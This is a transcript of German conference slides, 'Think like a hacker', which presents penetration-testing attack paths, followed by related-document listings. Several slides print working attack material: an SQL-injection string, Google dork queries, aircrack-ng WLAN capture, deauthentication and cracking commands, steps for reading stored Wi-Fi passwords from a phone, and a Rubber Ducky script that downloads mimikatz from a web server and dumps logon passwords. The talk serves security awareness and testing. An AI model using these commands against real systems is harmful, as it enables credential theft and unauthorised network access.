Denken wie ein Hacker. Internet Security Days Peter Feil

Größe: px
Ab Seite anzeigen:

Download "Denken wie ein Hacker. Internet Security Days Peter Feil"

Transkript

1 Denken wie ein Hacker Internet Security Days Peter Feil

2 Themen Keiner der Punkte stammt aus dem Labor, sondern sind Teile von Pentests. Gedanken vor der Untersuchung Von Außen nach Innen 1. Weltweiter Zugriff 1. a) Angriff über schlecht gesicherte Server 2. b) Skalpell 3. Malware Constructionkits 4. Google Hacks 2. Firmennaher Zugriff 1. WLAN 2. Mitarbeiterhandy 3. Interner Zugriff 1. BadUSB, Mimikatz und Co. 2. Physikalische Zugänge 3. Umgehung der Firewall Alle Methoden sind seit Jahren bekannt und es wird nur wenig dagegen gemacht.

3 Gedanken vor der Untersuchung 1. Verzichte auf Einteilungen wie Scriptkiddie etc. das ist unsinnig Ohhh Daten sind gestohlen und der Server ist down? Egal, war doch nur ein Scriptkiddie 2. Überlege, welche Werte die Firma für DICH bereit halten könnte und versetze dich in das Gedankengut eines Angreifers. 3. Löse dich von Begriffen wie Pentest etc. Statt dessen: Plane einen Einbruch. 4. Löse dich von Produkten. Überlege erst, was Du angreifen willst und dann mache dir über das wie Gedanken. 5. Nutze die einfachste Möglichkeit (offene Türen, Zutritt über die Raucherecke etc.). Der Angreifer tuts auch. 6. Aber: Sei gründlich und ruhe dich nicht auf dem ersten Treffer aus. 7. Nutze alle Möglichkeiten die für DICH legal sind. Ein Angreifer pfeift auch auf firmeninterne Gegebenheiten. Bitte jetzt nicht angreifen, die Admins sind im Urlaub / krank. Oder: Wir müssen wissen, wann der Test statt findet, damit wir Sicherheitskopien anlegen können. 8. Halte den Kreis der Eingeweihten gering 9. Tue Gutes und rede darüber

4 1.1. Angriff über schlecht gesicherte Server mittels Scanner (Holzhammer) Der Angriff erfolgt automatisch über einen Scanner, die es kostenlos im Internet gibt: o Nessus o Openvas o Metasploit framework (Exploit Kit) o Burp o IKE-Scan o Arachni o

5 1.2. Angriff über schlecht gesicherte Server (Skalpell) Manipulation von Parametern per SQL Injection ' or '1' = '1

6 1.3.Malware Constructionkits (Beispiel: Crimepack etc.) Crimepack Nur ein Trottel probiert mit beiden Beinen, wie tief das Wasser ist. Afrikanisches Sprichwort

7 1.4 Google Hacks o inurl:main.php phpmyadmin o inurl:perl/printenv o Index of / chat/logs o intitle: statistics of advanced web statistics o not for distribution confidential o fcgi-bin/echo o inurl:admin.php o filetype:pst inurl:"outlook.pst"

8 2.1.WLAN 1. Daten sammeln airodump-ng c xx w test wlanx 2. Alle Clients vom Router trennen aireplay-ng -0 0 e NamedesWLANS wlanx 3. Passwort knacken aircrack-ng *.cap w /listen/top150.txt Oder ein Dauer DOS Angriff per Raspberry PI Besser ein schlechtes Passwort als gar keine Lücke! Aus dem Tagebuch eines Hackers

9 2.2.a Mitarbeiterhandy BYOD = B.Y.O.Network Toolgesteuerter Angriff Einfache Durchführung Multiple Angriffsmöglichkeiten Geringes Erkennungspotential Passwort lange Zeit gültig Geringer apparativer Aufwand

10 2.2.b Mitarbeiterhandy Rootexplorer starten - bsp. ES File Explorer mit aktivierten Root Funktionen Navigieren ins Verzeichnis /data/misc/wifi Die Datei wpa_supplicant.conf bzw. bei einigen ROMs auch bcm_supp.conf mit einem Texteditor öffnen (ES File Explorer hat einen integriert) Unverschlüsseltes Passwort sowie WLAN-Zugänge auslesen und nutzen Das Device dem Besitzer zurück geben Action

11 3.1.a BadUSB, Mimikatz und Co. 1. Simuliert ein Keyboard 2. BadUSB, benötigt Java, Visual Studio und SDCC SDCC - Visual Studio - Tools - RubberDucky Chip: Phison 2303 ( ). Programm zum Testen: Flash Drive Information Extractor Patriot 8GB Supersonic Xpress* Kingston DataTraveler 3.0 T111 8GB Silicon power marvel M60 64GB Patriot Stellar 64 Gb Phison Toshiba TransMemory-MX USB GB (May ship with 2307) Toshiba TransMemory-MX USB 3.0 8GB (May ship with 2307) Kingston DataTraveler G4 64 GB Patriot PSF16GXPUSB Supersonic Xpress 16GB Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K) Verbatim STORE N GO 32GB USB Der manipulierte USB-Stick kann nach Verbinden mit dem Rechner weiteren schadhaften Code aus dem Internet nachladen um das System zu übernehmen

12 3.1.b BadUSB, Mimikatz und Co. Mimikatz Script: Auslesen der Passwörter REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) DELAY 3000 CONTROL ESCAPE STRING cmd CTRL-SHIFT ENTER ALT y ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile(' me with webserver ip/host>/mimikatz.exe','%temp%\mimikatz.exe') ENTER STRING %TEMP%\mimikatz.exe ENTER STRING privilege::debug ENTER STRING sekurlsa::logonpasswords full ENTER STRING exit ENTER STRING del %TEMP%\mimikatz.exe ENTER Weitere Skripte Test Weitere Bearbeitung der Hashes mit John the Ripper oder Cain und Abel

13 3.3.a Umgehung der Firewall Wenn es schnell gehen muss: ü Nexus 6 ü OTG Adapter ü Fast Ethernet USB To LAN Adapter ü Software SSH Server kostenlos! Root wird nicht benötigt Kostenpunkt: ca. 475,00 EURO

14 3.3.b Umgehung der Firewall mit dem Nexus 6 +

15 Zeit für Ihre Fragen Cloud Computing und europäischer Datenschutz 15

HID Angriffe mit Rubber Ducky und BADUSB

HID Angriffe mit Rubber Ducky und BADUSB HID Angriffe mit Rubber Ducky und BADUSB Agenda 2 HID HID Angriffe Rubber Ducky Arduino Rubber Ducky BADUSB PoisonTap Sonstiges Gegenmaßnahmen USB-HID 3 USB-HID Geräteklasse des USB Standards Treiber meistens

Mehr

Mobile Security & Privacy Lab

Mobile Security & Privacy Lab Mobile Security & Privacy Lab 1 Gliederung in Module Browser- Settings Cookies Man in the middle Public Hotspot Flash Targeted Advertising Webtracking WLAN und Datensicherheit HTTPS WPA2 VPN Reverse Engineering

Mehr

IT-Security-Symposium 2019 IT- Security im Fokus

IT-Security-Symposium 2019 IT- Security im Fokus IT-Security-Symposium 2019 IT- Security im Fokus Datensicherheit richtig überwachen und verwalten wie Sie Datenschutzverstöße verhindern. Referent: Michael Veit, Technology Evangelist, Sophos Sicherheit-als-System

Mehr

Moderne APT-Erkennung: Die Tricks der Angreifer

Moderne APT-Erkennung: Die Tricks der Angreifer Moderne APT-Erkennung: Die Tricks der Angreifer CeBIT 2016, 16.03.2016 Ihr Referent: Dominique Petersen petersen [at] finally-safe.com Halle 6, Stand G30 Agenda Wer ist finally safe? Advanced Persistent

Mehr

Sicherheit wird messbar Lösungsansätze und Methoden. Email Case. 15. September 2009, Hotel St. Gotthard, Zürich

Sicherheit wird messbar Lösungsansätze und Methoden. Email Case. 15. September 2009, Hotel St. Gotthard, Zürich Sicherheit wird messbar Lösungsansätze und Methoden Email Case 15. September 2009, Hotel St. Gotthard, Zürich ActiveSync Div. Email Landschaft PeerToPeer -USB -Bluetooth Smart phone Netzwerk - Ethernet

Mehr

In roten und goldenen Wäldern

In roten und goldenen Wäldern Folie 1 In roten und goldenen Wäldern Active Directory Security heute Robin Beismann Nils Kaczenski Einleitung: Nils (5 Min.) Folie 2 Ellen Bogen hat Besuch? DC, DNS, DC, DNS, DHCP Unsere WINS Domäne ist

Mehr

HasenbeinPlus 2016 Installation und Administration

HasenbeinPlus 2016 Installation und Administration MAI 2017 HasenbeinPlus 2016 Installation und Administration HASENBEIN SOFTWARE GMBH Steinrieke 38, 33034 Brakel 1 HasenbeinPlus 2016 Inhalt Willkommen bei HasenbeinPlus... 2 Übersicht der Komponenten...

Mehr

Einrichtung der Raspberry Pi

Einrichtung der Raspberry Pi Einrichtung der Raspberry Pi mit dem Raspbian (Wheezy) Stand: 06.09.2016 Inhalt 1. Einleitung... 1 2. Aktuelles Image herunterladen und installieren... 2 3. Die Pi starten und mit dem Rechner verbinden...

Mehr

Sicher im Internet. PC-Treff-BB. Peter Rudolph

Sicher im Internet. PC-Treff-BB. Peter Rudolph Sicher im Internet Sicher im Internet, Folie 1 von 15 Peter Rudolph 12.12.2015 Risiken Sicher im Internet, Folie 2 von 15 Viren böswilliges Programm automatische Verbreitung (Ansteckung) Ziel: PC funktionsuntüchtig

Mehr

Startup, Shutdown und Reboot eines Raspberry Pi über die HomeMatic CCU

Startup, Shutdown und Reboot eines Raspberry Pi über die HomeMatic CCU Zu verschiedenen Zwecken kann es nützlich sein, einen Raspberry Pi über die HomeMatic CCU hochzufahren, herunterzufahren oder neu zu starten. Dies ist z.b. dann sinnvoll, wenn sich der Raspberry Pi an

Mehr

Sichere Programmierung. Klaus Kusche

Sichere Programmierung. Klaus Kusche Sichere Programmierung Klaus Kusche Typische Ursachen für Lücken Große Mehrheit aller Lücken: Speicherüberschreiber Fehlende Input-Filterung ==> Jeweils eigener Foliensatz Restliche Lücken: Mehrere verschiedene

Mehr

Lücke in der JavaScript-Engine von ios [ ]

Lücke in der JavaScript-Engine von ios [ ] Lücke in der JavaScript-Engine von ios [07.11.2011] Kombination aus trojanischem Pferd, Nachladen von Schadcode und fehlerhafter JavaScript-Implementierung. Demo-App von Charlie Miller für Konferenz SyScan

Mehr

Infoveranstaltung IT-Sicherheit für KMU: Angriffe auf und Schutzmaßnahmen für mobile Endgeräte

Infoveranstaltung IT-Sicherheit für KMU: Angriffe auf und Schutzmaßnahmen für mobile Endgeräte Infoveranstaltung IT-Sicherheit für KMU: Angriffe auf und Schutzmaßnahmen für mobile Endgeräte Prof. Dr. Konstantin Knorr knorr@hochschule-trier.de Fachbereich Informatik Hochschule Trier 27. November

Mehr

quickterm Systemvoraussetzungen Dokumentversion 1.0

quickterm Systemvoraussetzungen Dokumentversion 1.0 quickterm 5.6.6 Systemvoraussetzungen Inhaltsverzeichnis Inhaltsverzeichnis 1 Systemvoraussetzungen quickterm Server... 3 2 Systemvoraussetzungen quickterm Client... 5 3 Systemvoraussetzungen quickterm

Mehr

Reale Angriffsszenarien - Überblick

Reale Angriffsszenarien - Überblick IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien - Überblick kai.jendrian@secorvo.de Security Consulting GmbH, Karlsruhe Seite 1 Inhalt Praxisprobleme Aktuelle Angriffsmethoden

Mehr

Kombinierte Attacke auf Mobile Geräte

Kombinierte Attacke auf Mobile Geräte Kombinierte Attacke auf Mobile Geräte 1 Was haben wir vorbereitet Man in the Middle Attacken gegen SmartPhone - Wie kommen Angreifer auf das Endgerät - Visualisierung der Attacke Via Exploit wird Malware

Mehr

Neues aus dem DFN-CERT. 54. DFN-Betriebstagung - Forum Sicherheit 15. März 2011 Tilmann Haak, DFN-CERT

Neues aus dem DFN-CERT. 54. DFN-Betriebstagung - Forum Sicherheit 15. März 2011 Tilmann Haak, DFN-CERT Neues aus dem DFN-CERT 54. DFN-Betriebstagung - Forum Sicherheit 15. März 2011 Tilmann Haak, DFN-CERT Agenda Aktuelle Schwachstellen Automatische Warnmeldungen Aktuelle Vorfälle Im Fall

Mehr

MAGIC AC1 XIP. Secure Login Update ab Version 5.x. Kontakt: Telefon AVT Audio Video Technologies GmbH

MAGIC AC1 XIP. Secure Login Update ab Version 5.x. Kontakt: Telefon AVT Audio Video Technologies GmbH MAGIC AC1 XIP Secure Login Update ab Version 5.x Kontakt: Telefon +49 911 5271-110 E-Mail support@avt-nbg.de AVT Audio Video Technologies GmbH Der bisherige einfache und unverschlüsselte Passwortschutz

Mehr

Moderne APT-Erkennung: Die Tricks der Angreifer SecuMedia Forum, CeBIT 2016

Moderne APT-Erkennung: Die Tricks der Angreifer SecuMedia Forum, CeBIT 2016 Halle 6, Stand G30 Moderne APT-Erkennung: Die Tricks der Angreifer SecuMedia Forum, CeBIT 2016 16. März 2016 Vortrag: Diego Sanchez sanchez@finally-safe.com https://www.finally-safe.com Seite 2 18.02.2016

Mehr

MALWARE DEFENSE IM INNEREN DES BÖSEN

MALWARE DEFENSE IM INNEREN DES BÖSEN AUTOMATED ENDPOINT SECURITY MALWARE DEFENSE IM INNEREN DES BÖSEN Cyberkriminalität ist ein florierendes Geschäftsfeld! Carsten Maceus PreSales Consultant carsten.maceus@matrix42.com Daniel Döring Technical

Mehr

Computer Praktikum COPR Netzwerk. DI (FH) Levent Öztürk

Computer Praktikum COPR Netzwerk. DI (FH) Levent Öztürk Computer Praktikum COPR Netzwerk DI (FH) Levent Öztürk Lokales Netzwerk u. Internet WLAN Notebook1 IP-Adresse SWITCH WLAN ROUTER MODEM Notebook2 IP-Adresse IP-Adresse Private IP-Adresse Public PROVIDER

Mehr

Lumension Endpoint Security auf elux RP Stand:

Lumension Endpoint Security auf elux RP Stand: Lumension Endpoint Security auf elux RP Stand: 2014-02-15 Inhalt: 1. Über Lumension 2 2. Voraussetzungen 3 3. Funktionsweise 4 4. Der Installationsvorgang 5 2016 Unicon Software Entwicklungs- und Vertriebsgesellschaft

Mehr

OpenWRT mit Raspberry Pi

OpenWRT mit Raspberry Pi OpenWRT mit Raspberry Pi Folie 1 von 27 OpenWRT mit Raspberry Pi Katrin Eppler Agenda Wieso, weshalb, warum? Ausgangslage Ziel Lösungssuche Lösungsansatz Umsetzung - Einrichtung OpenWRT auf Raspberry Pi

Mehr

S7: Java als Sicherheitsrisiko security-zone Renato Ettisberger

S7: Java als Sicherheitsrisiko security-zone Renato Ettisberger S7: Java als Sicherheitsrisiko security-zone 2011 Renato Ettisberger renato.ettisberger@switch.ch Zürich, 11. Oktober 2011 Security (SWITCH-CERT) Derzeit 7 Mitarbeiter, bald 10 Unser Team erbringt Security-Dienstleistungen

Mehr

PPL 10 Installationsanleitung

PPL 10 Installationsanleitung PPL 10 Installationsanleitung Stand Dez 2016 PASCHAL PLAN light 10 Installationsanleitung Seite 1 von 23 Inhaltsverzeichnis Inhalt... 2 Schritt 1 Installation Dongle Software... 3 Schritt 2 Überprüfung

Mehr

kim.uni-hohenheim.de

kim.uni-hohenheim.de VPN-Client Apple ios 10.0.2 Konfiguration und Installation des internen VPN-Clients und Cisco AnyConnect VPN-Clients Configuring and installing the internal VPN client and Cisco AnyConnect VPN client 09.10.2018

Mehr

Security-Webinar. September Dr. Christopher Kunz, filoo GmbH

Security-Webinar. September Dr. Christopher Kunz, filoo GmbH Security-Webinar September 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _

Mehr

Sichere Software. Vermeidung von Angriffspunkten bei der Software-Entwicklung. Andreas Vombach

Sichere Software. Vermeidung von Angriffspunkten bei der Software-Entwicklung. Andreas Vombach Sichere Software Vermeidung von Angriffspunkten bei der Software-Entwicklung Andreas Vombach Einleitung Mein Hintergrund Von der Hardware- zur Softwareentwicklung Software im Banking Bereich Erlebnisse

Mehr

Web Application Testing

Web Application Testing Sicherheit von Web Applikationen - Web Application Testing Veranstaltung: IT-Sicherheitstag NRW, 04.12.2013, KOMED MediaPark, Köln Referent: Dr. Kurt Brand Geschäftsführer Pallas GmbH Pallas GmbH Hermülheimer

Mehr

Testen von System- & Netzwerksicherheit. Seminar IT-Security HU Berlin 2004, Andreas Dittrich & Philipp Reinecke

Testen von System- & Netzwerksicherheit. Seminar IT-Security HU Berlin 2004, Andreas Dittrich & Philipp Reinecke 1 Testen von System- & Netzwerksicherheit 2 Gliederung Sicherheit im Allgemeinen Testbereiche Methodik und Standards Hilfsmittel im Speziellen nessus nmap Szenario im praktischen Teil 3 Fragen zur Sicherheit

Mehr

Daniel Schalberger, SySS GmbH 1. Typische Schwachstellen im Online-Handel, Prävention. Dipl. Inform. Daniel Schalberger, Syss GmbH

Daniel Schalberger, SySS GmbH 1. Typische Schwachstellen im Online-Handel, Prävention. Dipl. Inform. Daniel Schalberger, Syss GmbH 11.12.2012 Daniel Schalberger, SySS GmbH 1 LIVE-HACKING, Typische Schwachstellen im Online-Handel, Prävention Dipl. Inform. Daniel Schalberger, Syss GmbH 11.12.2012 Daniel Schalberger, SySS GmbH 2 Daniel

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Cybersecurity in der

Cybersecurity in der 21. September 2018 Mainz www.pwc.de Cybersecurity in der Finanzindustrie Angreifertypen Staaten Hacktivisten Organisierte Kriminalität Cyber-Terroristen MADKON 18 - Cybersecurity in der Finanzindustrie

Mehr

A new Attack Composition for Network Security

A new Attack Composition for Network Security A new Attack Composition for Network Security Autoren: Frank Beer Tim Hofer David Karimi Prof. Dr. Ulrich Bühler 10. DFN-Forum Kommunikationstechnologien Motivation Welche Eigenschaften muss ein Dataset

Mehr

quickterm 5.4 Systemvoraussetzungen

quickterm 5.4 Systemvoraussetzungen quickterm 5.4 Systemvoraussetzungen 5.4 27.01.2014 Inhaltsverzeichnis Inhaltsverzeichnis 1 Server... 3 2 Client... 4 3 Web... 5 2 / 5 5.4 Kaleidoscope GmbH Server 1 1 Server Stellen Sie vor der Installation

Mehr

Über mich. Dem Hacker keine Chance Marc Nilius WordPress-Meetup Bonn

Über mich. Dem Hacker keine Chance Marc Nilius WordPress-Meetup Bonn Über mich Diplom-Informatiker und selbständiger Web-Entwickler WordPress-Wartung und WordPress-Sicherheit @marcnilius oder @wpsicherheit https://www.wp-wartung24.de Co-Organizer diverser Meetups und WordCamps

Mehr

WEKA Honorarabrechnung leicht gemacht manuelle Installation vom MS-SQL Server 2014 SP2 Express Stand 06/2018

WEKA Honorarabrechnung leicht gemacht manuelle Installation vom MS-SQL Server 2014 SP2 Express Stand 06/2018 Installation MS-SQL Server 2014 SP2 Express Es ist bislang noch kein MS SQL Server 2014 auf dem Rechnersystem vorhanden. Unter dem folgenden Link kann der MS- SQL Server 2014 SP2 Express heruntergeladen

Mehr

Beispielanleitung zum Ex- / Import einer SQL-Express-Datenbank

Beispielanleitung zum Ex- / Import einer SQL-Express-Datenbank Beispielanleitung zum Ex- / Import einer SQL-Express-Datenbank Sollte ein Serverwechsel für Timemaster Web stattfinden, so können häufig die im SQL- Express-Server gespeicherten Daten mithilfe der Microsoft

Mehr

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist?

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? Pallas Security Colloquium Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? 18.10.2011 Referent: Tim Kretschmann Senior System Engineer, CISO Pallas GmbH Hermülheimer Straße 8a

Mehr

Darf ich mich vorstellen?

Darf ich mich vorstellen? Hacking Night mit PROFIs Max Schmitt infiziert - Trojaner, Wu rmer, Viren, Ransomware und weiteres digitales Ungeziefer, das Handwerkszeug von Cyberkriminellen PROFI AG München Marco Di Filippo (MadIFI)

Mehr

Home-Router als Einfallstor ins Firmennetzwerk?

Home-Router als Einfallstor ins Firmennetzwerk? Home-Router als Einfallstor ins Firmennetzwerk? walter.sprenger@csnc.ch BeerTalk, 9. November 2015 Compass Security Deutschland GmbH Tauentzienstr. 18 De-10789 Berlin Tel. +49 30 21 00 253-0 Fax +49 30

Mehr

Cyber War die Bedrohung der Zukunft Lehrerinformation

Cyber War die Bedrohung der Zukunft Lehrerinformation Lehrerinformation 1/5 Arbeitsauftrag Ziel Die Sch informieren sich in 2er-Gruppen mit dem APP isoldat über die folgenden Themen: - Technologietrends und Szenarien - Bedrohungen - Die wichtigsten Regeln

Mehr

Alptraum: Daten weg? Wie Sie wieder ruhig schlafen. Fabian Krause - Projekte & Training - combit, Konstanz

Alptraum: Daten weg? Wie Sie wieder ruhig schlafen. Fabian Krause - Projekte & Training - combit, Konstanz Alptraum: Daten weg? Wie Sie wieder ruhig schlafen. Fabian Krause - Projekte & Training - combit, Konstanz krause@combit.net +49 7531 906010 Alptraum: Daten weg? Unser Programm heute Alptraum: Daten weg?

Mehr

WEKA Honorarabrechnung leicht gemacht manuelle Installation vom MS-SQL Server 2014 SP2 Express Stand 10/2016

WEKA Honorarabrechnung leicht gemacht manuelle Installation vom MS-SQL Server 2014 SP2 Express Stand 10/2016 Installation MS-SQL Server 2014 SP2 Express Es ist bislang noch kein MS SQL Server 2014 auf dem Rechnersystem vorhanden. Unter dem folgenden Link kann der MS- SQL Server 2014 SP2 Express heruntergeladen

Mehr

WLAN Nutzung an der HTL Kapfenberg

WLAN Nutzung an der HTL Kapfenberg WLAN Nutzung an der HTL Kapfenberg Version Datum Bezeichnung Verantwortlicher V1.0 27.05.18 Erstanlage des Dokuments ht Inhaltsverzeichnis 1 Einleitung... 1 2 Schnellanleitung für WLAN-Einrichtung... 2

Mehr

Bitte beachten Sie: Diese Anleitung kann auch für die Installation der Version 10.0 verwendet werden.

Bitte beachten Sie: Diese Anleitung kann auch für die Installation der Version 10.0 verwendet werden. Installationsanleitung PPL 11.0 Inhalt Schritt 1 Installation Dongle Software... 2 Schritt 2 Überprüfung Installation Dongle Software... 4 Schritt 3 Überprüfung der JAVA Version... 5 Schritt 4 Installation...

Mehr

VALUE ADDED IT-DISTRIBUTOR. AUS ÜBERZEUGUNG. SicherheIT für Systemhäuser

VALUE ADDED IT-DISTRIBUTOR. AUS ÜBERZEUGUNG. SicherheIT für Systemhäuser Fließtext VALUE ADDED IT-DISTRIBUTOR. AUS ÜBERZEUGUNG. SicherheIT für Systemhäuser Ihre Sprecher: Dr.-Ing Christopher Meyer, Pre-Sales Manager, Gemalto IDP Andreas Pieri, Distribution Channel Manager,

Mehr

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation Departement Wirtschaft IT Forensics in action against malicious Software of the newest generation Dipl. Ing. Uwe Irmer IT Security- Schnappschüsse 2 Malware der neuesten Generation Professionalität- wer

Mehr

DIE KUNST DER DIGITALEN VERTEIDIGUNG

DIE KUNST DER DIGITALEN VERTEIDIGUNG DIE KUNST DER DIGITALEN VERTEIDIGUNG Thomas Werth Widmung Wenn aus Liebe Leben wird, trägt das Glück einen Namen: - Maya - INHALT Vorwort Seite 11 Geleitwort Seite 16 Kapitel 1 Bedrohungen und Risiken

Mehr

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München Time CGI Version 1.5 Stand 04.12.2013 TimeMachine Dokument: time.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor Version Datum Kommentar

Mehr

Agenda 2019 für Service Management: Integration mit Datenschutz macht den Unterschied

Agenda 2019 für Service Management: Integration mit Datenschutz macht den Unterschied Agenda 2019 für Service Management: Integration mit Datenschutz macht den Unterschied Agenda Einheitliches, sicheres und konformes digitales Arbeitsplatzmanagement Aktuelle Herausforderungen Security Management

Mehr

Anleitung Anschluss der BYD B-BOX HV an den PIKO BA Wechselrichter

Anleitung Anschluss der BYD B-BOX HV an den PIKO BA Wechselrichter Anleitung Anschluss der BYD B-BOX HV an den PIKO BA Wechselrichter Seite 1 / 9 Schritt 1: PIKO BA Wechselrichter Update Die Neue Software (UI 06.41 und FW 02.30) auf dem PIKO BA Wechselrichter installieren.

Mehr

Einfallstore in Webanwendungen und deren Folgen

Einfallstore in Webanwendungen und deren Folgen Einfallstore in Webanwendungen und deren Folgen Dipl.-Inform. Dominik Vallendor 14.07.2012 Tralios IT GmbH www.tralios.de Über mich Dominik Vallendor Studium der Informatik in Karlsruhe Ca. 17 Jahre Linux-Erfahrung

Mehr

WordPress lokal mit Xaamp installieren

WordPress lokal mit Xaamp installieren WordPress lokal mit Xaamp installieren Hallo und willkommen zu einem weiteren Teil der WordPress Serie, in diesem Teil geht es um die Lokale Installation von WordPress mithilfe von Xaamp. Kurz und knapp

Mehr

Professionelle Angriffs- und Verteidigungstechniken gegen Hacker und Datendiebe

Professionelle Angriffs- und Verteidigungstechniken gegen Hacker und Datendiebe Dr. Peter Kraft / Andreas Weyert UU Professionelle Angriffs- und Verteidigungstechniken gegen Hacker und Datendiebe o Mit 395 Abbildungen Z3 ;veirz< Teil I: Tools - Werkzeuge für Angriff und Verteidigung

Mehr

Informationssammlung NETWORKING ACADEMY DAY 2017 REGENSTAUF

Informationssammlung NETWORKING ACADEMY DAY 2017 REGENSTAUF Informationssammlung NETWORKING ACADEMY DAY 2017 REGENSTAUF 31.3.2017 Cyberthreat Real-Time Map Die größten Datenlecks 2015 untersuchte Cisco 115.000 Geräte, um auf die Risiken von unzureichend gepflegter,

Mehr

Datenschutztag. Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke

Datenschutztag. Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke Datenschutztag Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke 1. Website Security Gliederung 2. Viren, Trojaner & Antivirensoftware 3. Phishing & Gefahren des World Wide

Mehr

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr.

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr. Installation und Konfiguration Version 1.4 Stand 21.11.2013 TimeMachine Dokument: install.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor

Mehr

Quality. Excellence. Navigation. Knowledge. Security. Management. Systemanforderungen für die Installation von. QLogBook2010 ab Version 2.9.

Quality. Excellence. Navigation. Knowledge. Security. Management. Systemanforderungen für die Installation von. QLogBook2010 ab Version 2.9. Systemanforderungen für die Installation von QLogBook2010 ab Version 2.9.2 Quality Security Excellence Process Risk Management Knowledge Navigation QLogBook Systemanforderungen_rev04.docx Inhaltsverzeichnis

Mehr

Live Hacking: : So brechen Hacker in Ihre Netze ein

Live Hacking: : So brechen Hacker in Ihre Netze ein Live Hacking: : So brechen Hacker in Ihre Netze ein Security Consultant Micha Borrmann SySS GmbH Friedrich-Dannenmann-Str. 2 D-72070 Tübingen Agenda 1. Einleitung 2. Netbios-Angriffe

Mehr

Red Attack - Die Katastrophe in der Datenbank

Red Attack - Die Katastrophe in der Datenbank Red Attack - Die Katastrophe in der Datenbank Schlüsselworte Datenbank Sicherheit Einleitung Gunther Pippèrr GPI Consult München Was kann ein User mit genügend Rechten in der Datenbank anrichten? Mit welchen

Mehr

Web Application Security: SQL-injection, Cross Site Scripting -- w3af

Web Application Security: SQL-injection, Cross Site Scripting -- w3af Web Application Security: SQL-injection, Cross Site Scripting -- w3af 1 Web 2.0 Application und Angriffspunkte Grundlagen: SQL SQL-injection Cross Site Scripting Web Application Scans mit w3af 2 Eine Web

Mehr

Next Generation Server Protection

Next Generation Server Protection Next Generation Server Protection Ransomware-Schutz, automatisches Whitelisting und Synchronized Security Michael Veit Technology Evangelist Server-Schutz der nächsten Generation Wer ist Sophos? Automatisches

Mehr

secion Fact Sheet BLACK BOX AUDIT

secion Fact Sheet BLACK BOX AUDIT secion Fact Sheet BLACK BOX AUDIT Das secion Black Box Audit ist ein wichtiger Bestandteil des secion Penetrationstests und stellt die Simulation eines gezielten Angriffs auf Komponenten Ihrer IT-Infrastruktur

Mehr

Fehlende Input-Filterung. Klaus Kusche

Fehlende Input-Filterung. Klaus Kusche Fehlende Input-Filterung Klaus Kusche Grund-Problem Benutzer-Eingaben (= meist Eingaben in Web-Formularen, aber auch Commandline- oder Dialog-Inputs, Dateien und Netz-Requests,...) werden nicht gefiltert

Mehr

Installation von Microsoft SQL Server 2014 Express in Verbindung mit Postbuch

Installation von Microsoft SQL Server 2014 Express in Verbindung mit Postbuch Installation von Microsoft SQL Server 2014 Express in Verbindung mit Postbuch Vorbemerkung: Die folgende Anleitung zeigt eine (Referenz-)Installation des Microsoft SQL Server 2014 unter Verwendung des

Mehr

Webdeployment 2.0 Webanwendungen komfortabel bereitstellen, aus Hoster und Kundensicht.

Webdeployment 2.0 Webanwendungen komfortabel bereitstellen, aus Hoster und Kundensicht. Webdeployment 2.0 Webanwendungen komfortabel bereitstellen, aus Hoster und Kundensicht. Bernhard Frank Web Platform Architect Evangelist bfrank@microsoft.com Was braucht es zu einem Webserver? Webserver

Mehr

Was ist ein NetWorker LSSV?

Was ist ein NetWorker LSSV? NetWorker - Allgemein Tip 330, Seite 1/8 Was ist ein NetWorker LSSV? Hierbei handelt es sich um nichts weiter als um eine Abkürzung für eine spezielle NetWorker Version, die mit jeder Oracle Datenbank-Software

Mehr

ALM As-A-Service TFS zur hausinternen Cloud ausbauen

ALM As-A-Service TFS zur hausinternen Cloud ausbauen ALM As-A-Service TFS zur hausinternen Cloud ausbauen Sven Hubert AIT TeamSystemPro Team Das Unternehmen.NET Softwareentwicklung.NET Entwicklung.NET Software-Entwicklung Architektur Beratung Team Foundation

Mehr

Xesar. Inbetriebnahme Netzwerkadapter

Xesar. Inbetriebnahme Netzwerkadapter Xesar Inbetriebnahme Netzwerkadapter PC-Konfiguration Für die Konfiguration des Xesar- Netzwerkadapters können Sie einen Computer Ihrer Wahl benutzen, dies kann jedoch auch der PC sein, auf dem die Xesar-Software

Mehr

Hacker-Contest WS16/17. Anmeldungsaufgabe

Hacker-Contest WS16/17. Anmeldungsaufgabe Hacker-Contest WS16/17 Anmeldungsaufgabe Autor Almon, Ralf Version 1.0 Status Final Datum 07.10.2016 1 Allgemeines Für die Anmeldung zum Hacker-Contest gilt es dieses Semester eine Challenge aus dem Bereich

Mehr

